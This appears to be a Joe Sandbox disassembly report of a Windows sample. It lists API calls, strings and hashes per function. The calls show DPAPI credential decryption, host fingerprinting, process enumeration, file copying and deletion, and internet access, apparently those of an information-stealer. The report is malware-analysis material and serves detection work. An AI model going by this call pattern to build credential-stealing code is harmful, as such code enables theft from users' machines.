Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
Instruction ID: 8a55c6bb4586fa39bc5dd89715e436abefd5940c4b9bd8db073c1251d6bd8ac1
Opcode Fuzzy Hash: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
Instruction Fuzzy Hash: E3014FB5A40608BFDB20DBE4ED49FAEB77DEB88701F005154FA05E7290DB70AA01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00409970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(04070908,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 0040998D
LoadLibraryA.KERNEL32(04077270,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 00409A16

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0406DD00,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

SetEnvironmentVariableA.KERNEL32(04070908,00000000,00000000,?,0041DA4C,?,0040EA16,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0041D6EF), ref: 00409A02

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00409982, 00409996, 004099AC

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-3463377506
Opcode ID: 5e87bb327afe644bc77b25f1e22387be2ab2af628167e3175e717012408de276
Instruction ID: 6647cd3c00128b620a4a232c7fbe97fce3d03bd073b05a107f0d1bf2b4fd60a8
Opcode Fuzzy Hash: 5e87bb327afe644bc77b25f1e22387be2ab2af628167e3175e717012408de276
Instruction Fuzzy Hash: 134196B5900A009BDB24DFA4FD85AAE37B6BB44305F01512EF405A72E2DFB89D46CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004065D0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,@:h@,@:h@), ref: 0040668F

Strings

@:h@, xrefs: 00406670, 00406673
:h@, xrefs: 004065DD, 004065FD, 0040667F
:h@, xrefs: 0040660D, 00406629, 00406678, 00406688, 004065F4, 00406618, 00406623

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: :h@$:h@$@:h@
API String ID: 544645111-3492212131
Opcode ID: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
Instruction ID: 05c83ec730d02739dc9afbe7597ff905435882b08ae1c12394b3aafa6fe5c026
Opcode Fuzzy Hash: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
Instruction Fuzzy Hash: 272131B4A00208EFDB04CF85C544BAEBBB1FF48304F1185AAD406AB381D3399A91DF85

Uniqueness

Uniqueness Score: -1.00%

Function 0040CEC0 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,040779F8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF41
lstrlen.KERNEL32(00000000), ref: 0040D0DF
lstrlen.KERNEL32(00000000), ref: 0040D0F3
DeleteFileA.KERNEL32(00000000), ref: 0040D16C

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: c173c51fbfe223dc8c5039b41b5fbfd2ab8ba70fab74c7fee496f720ccfcfbc1
Instruction ID: 64a31cdf4344fffa4b83296b1621afa9cae3fe45de11617b70f8002e61f1a089
Opcode Fuzzy Hash: c173c51fbfe223dc8c5039b41b5fbfd2ab8ba70fab74c7fee496f720ccfcfbc1
Instruction Fuzzy Hash: 758147769102049BCB14FBA1DC52EEE7739BF54308F51411EF516B6091EF38AA89CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD10 Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004141C0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
Part of subcall function 004141C0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
Part of subcall function 004141C0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
Part of subcall function 004141C0: HeapAlloc.KERNEL32(00000000), ref: 004142A7

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00414300: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
Part of subcall function 00414300: HeapAlloc.KERNEL32(00000000), ref: 0041431B
Part of subcall function 00414300: RegOpenKeyExA.KERNEL32(80000002,040727F0,00000000,00020119,00000000), ref: 0041433B
Part of subcall function 00414300: RegQueryValueExA.KERNEL32(00000000,04076780,00000000,00000000,000000FF,000000FF), ref: 0041435C
Part of subcall function 00414300: RegCloseKey.ADVAPI32(00000000), ref: 00414366

Part of subcall function 00414380: GetCurrentProcess.KERNEL32(00000000,?,?,0040FF99,00000000,?,04077170,00000000,?,0041D74C,00000000,?,00000000,00000000,?,040707E8), ref: 0041438F
Part of subcall function 00414380: IsWow64Process.KERNEL32(00000000,?,?,0040FF99,00000000,?,04077170,00000000,?,0041D74C,00000000,?,00000000,00000000,?,040707E8), ref: 00414396

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,04070898,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 00414450: GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
Part of subcall function 00414450: HeapAlloc.KERNEL32(00000000), ref: 00414464
Part of subcall function 00414450: GetLocalTime.KERNEL32(?), ref: 00414471
Part of subcall function 00414450: wsprintfA.USER32 ref: 004144A0

Part of subcall function 004144B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,04076A38,00000000,?,0041D758,00000000,?,00000000,00000000,?,04077130,00000000), ref: 004144C0
Part of subcall function 004144B0: HeapAlloc.KERNEL32(00000000), ref: 004144C7
Part of subcall function 004144B0: GetTimeZoneInformation.KERNEL32(?), ref: 004144DA

Part of subcall function 00414530: GetUserDefaultLocaleName.KERNEL32(00000000,00000055,00000000,00000000,?,04076A38,00000000,?,0041D758,00000000,?,00000000,00000000,?,04077130,00000000), ref: 00414542

Part of subcall function 00414570: GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
Part of subcall function 00414570: LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
Part of subcall function 00414570: GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
Part of subcall function 00414570: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
Part of subcall function 00414570: LocalFree.KERNEL32(00000000), ref: 004146DF

Part of subcall function 00414710: GetSystemPowerStatus.KERNEL32(00000000), ref: 0041471A

GetCurrentProcessId.KERNEL32(00000000,?,04077190,00000000,?,0041D76C,00000000,?,00000000,00000000,?,04076A50,00000000,?,0041D768,00000000), ref: 0041037E

Part of subcall function 00415B70: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
Part of subcall function 00415B70: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
Part of subcall function 00415B70: CloseHandle.KERNEL32(00000000), ref: 00415BAF

Part of subcall function 00414740: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
Part of subcall function 00414740: HeapAlloc.KERNEL32(00000000), ref: 0041475B
Part of subcall function 00414740: RegOpenKeyExA.KERNEL32(80000002,04072828,00000000,00020119,00000000), ref: 0041477B
Part of subcall function 00414740: RegQueryValueExA.KERNEL32(00000000,04077410,00000000,00000000,000000FF,000000FF), ref: 0041479C
Part of subcall function 00414740: RegCloseKey.ADVAPI32(00000000), ref: 004147A6

Part of subcall function 00414800: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00414846
Part of subcall function 00414800: GetLastError.KERNEL32 ref: 00414855

Part of subcall function 004147C0: GetSystemInfo.KERNEL32(00000000), ref: 004147CD
Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147E3

Part of subcall function 00414960: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,04076828,00000000,?,0041D774,00000000,?,00000000,00000000,?,040768B8), ref: 0041496D
Part of subcall function 00414960: HeapAlloc.KERNEL32(00000000), ref: 00414974
Part of subcall function 00414960: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149AF
Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149BD
Part of subcall function 00414960: wsprintfA.USER32 ref: 004149E9

Part of subcall function 00414ED0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
Part of subcall function 00414ED0: HeapAlloc.KERNEL32(00000000), ref: 00414F23
Part of subcall function 00414ED0: wsprintfA.USER32 ref: 00414F3D

Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,04073228,00000000,00020019,00000000,0041D289), ref: 00414B41

Part of subcall function 00414AE0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
Part of subcall function 00414AE0: wsprintfA.USER32 ref: 00414BF6
Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C29
Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00414DE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
Part of subcall function 00414DE0: Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
Part of subcall function 00414DE0: Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
Part of subcall function 00414DE0: FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041095B

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04070728), ref: 00404ED9

Strings

E.A, xrefs: 00410981, 004109AC, 00410984

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$CloseOpen$wsprintf$Namelstrcpy$InformationLocallstrlen$CurrentInfoKeyboardLayoutListLocaleProcess32QueryStatusSystemTimeUserValue__aulldivlstrcat$ChangeComputerCreateDefaultDirectoryEnumErrorFileFindFirstFreeGlobalHandleInternetLastLogicalMemoryModuleNextNotificationPowerProcessorSnapshotToolhelp32VolumeWindowsWow64Zone
String ID: E.A
API String ID: 1035121393-2211245587
Opcode ID: 49a92f44dda008f29ff3be1199fba4f2435d2cff060490da4c1bc1825e576d3b
Instruction ID: c29c4d19e1a1d8256a8b8cfc17993bd3f91cdea4a247a897ffed86f061f16859
Opcode Fuzzy Hash: 49a92f44dda008f29ff3be1199fba4f2435d2cff060490da4c1bc1825e576d3b
Instruction Fuzzy Hash: 9372B076D10118AACB15FB91EC91EDEB73DAF14308F51439FB01662491EF346B89CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00411350 Relevance: 6.1, APIs: 4, Instructions: 100stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00411378

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

strtok_s.MSVCRT ref: 0041146F

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0406DD00,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: lstrcpystrtok_s$lstrlen
String ID:
API String ID: 3184129880-0
Opcode ID: ebd071ba295f9e6345a8f1ce033e7ea8a96eb40d49cbc6ef6f62b0c380326253
Instruction ID: bc44fb65e395c18893d79e2daadfc8d7f4384440e0cba23ba4018ddaa6f79c9f
Opcode Fuzzy Hash: ebd071ba295f9e6345a8f1ce033e7ea8a96eb40d49cbc6ef6f62b0c380326253
Instruction Fuzzy Hash: 04417175D00208DBCB04EFE5D855AEEBB75BF48304F00811EE51177290EB38AA85CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004096C0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

StrStrA.SHLWAPI(00000000,040766A8), ref: 0040971B

Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F

memcmp.MSVCRT ref: 00409774

Part of subcall function 00409540: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
Part of subcall function 00409540: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
Part of subcall function 00409540: LocalFree.KERNEL32(?), ref: 004095AF

Strings

DPAPI, xrefs: 0040976B
, xrefs: 004097A3

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$ChangeCloseCreateDataFindNotificationReadSizeUnprotectlstrcpymemcmp
String ID: $DPAPI
API String ID: 2647593125-1819349886
Opcode ID: 9501cc2230a19d62742dd6fac07f5f7f22815d6b42f4b3c90aed0b997707f15c
Instruction ID: 25d6f3248392bfa9bca68fd769027b68fff5740b7e0b7820d89104a1b18a6e16
Opcode Fuzzy Hash: 9501cc2230a19d62742dd6fac07f5f7f22815d6b42f4b3c90aed0b997707f15c
Instruction Fuzzy Hash: 493141B6D10108EBCF04DF94DC45AEFB7B9AF48704F14452DE905B3292E7389A44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414DE0 Relevance: 6.1, APIs: 4, Instructions: 60processCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
Process32Next.KERNEL32(00000000,00000128), ref: 00414E30

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 3491751439-0
Opcode ID: b217f11ee595118c12510416ca198f6e5f4cd8a2818699d74d2b05badb52671e
Instruction ID: b51d58226d22fc07b4aaea4bdcaba1b12d12dab42e387443cd86e66b2ce9f1c4
Opcode Fuzzy Hash: b217f11ee595118c12510416ca198f6e5f4cd8a2818699d74d2b05badb52671e
Instruction Fuzzy Hash: ED211D759002189BCB24EB61DC95FDEB779AF54304F1041DAA50A66190DF38AFC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004159E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00411879,80000000,00000003,00000000,00000003,00000080,00000000,?,00411879,?), ref: 004159FC
GetFileSizeEx.KERNEL32(000000FF,00411879), ref: 00415A19
CloseHandle.KERNEL32(000000FF), ref: 00415A27

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
Instruction ID: adbcd47bb22ca6d6b42933acd4cabc8e10c5a14c322029dfd4b487fe3fd33794
Opcode Fuzzy Hash: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
Instruction Fuzzy Hash: C9F03139F44604FBDB20DBF0DC85BDE7779BF44710F118255B951A7280DA7496428B44

Uniqueness

Uniqueness Score: -1.00%

Function 004137B3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0406DD00,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
CloseHandle.KERNEL32(00000000), ref: 004137B9
Sleep.KERNEL32(00001770), ref: 004137C4
CloseHandle.KERNEL32(?,00000000,?,0406DD00,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
ExitProcess.KERNEL32 ref: 004137E2

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
Instruction ID: 00ad45554361a1bf9ffb836df5d455c5d00fe00f471bf70531fad30136aebd8c
Opcode Fuzzy Hash: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
Instruction Fuzzy Hash: 5FF054B0944206AAE720AFA1DD05BFE7675BB08B46F10851AF612951C0DBB856818A5D

Uniqueness

Uniqueness Score: -1.00%

Function 00406730 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

Pi@, xrefs: 0040684E, 0040689F, 00406884, 0040679E, 004067C2

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID:
String ID: Pi@
API String ID: 0-1360946908
Opcode ID: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
Instruction ID: 3e1b1374d11ee30af11b8018be346ecc1401931fa3badc01db0dac5c56ce0c6a
Opcode Fuzzy Hash: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
Instruction Fuzzy Hash: 756105B5D00208DBDB14DF94D984BEEB7B0AB48304F1185AAE80677380D739AEA5DF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404470 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60stringnetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
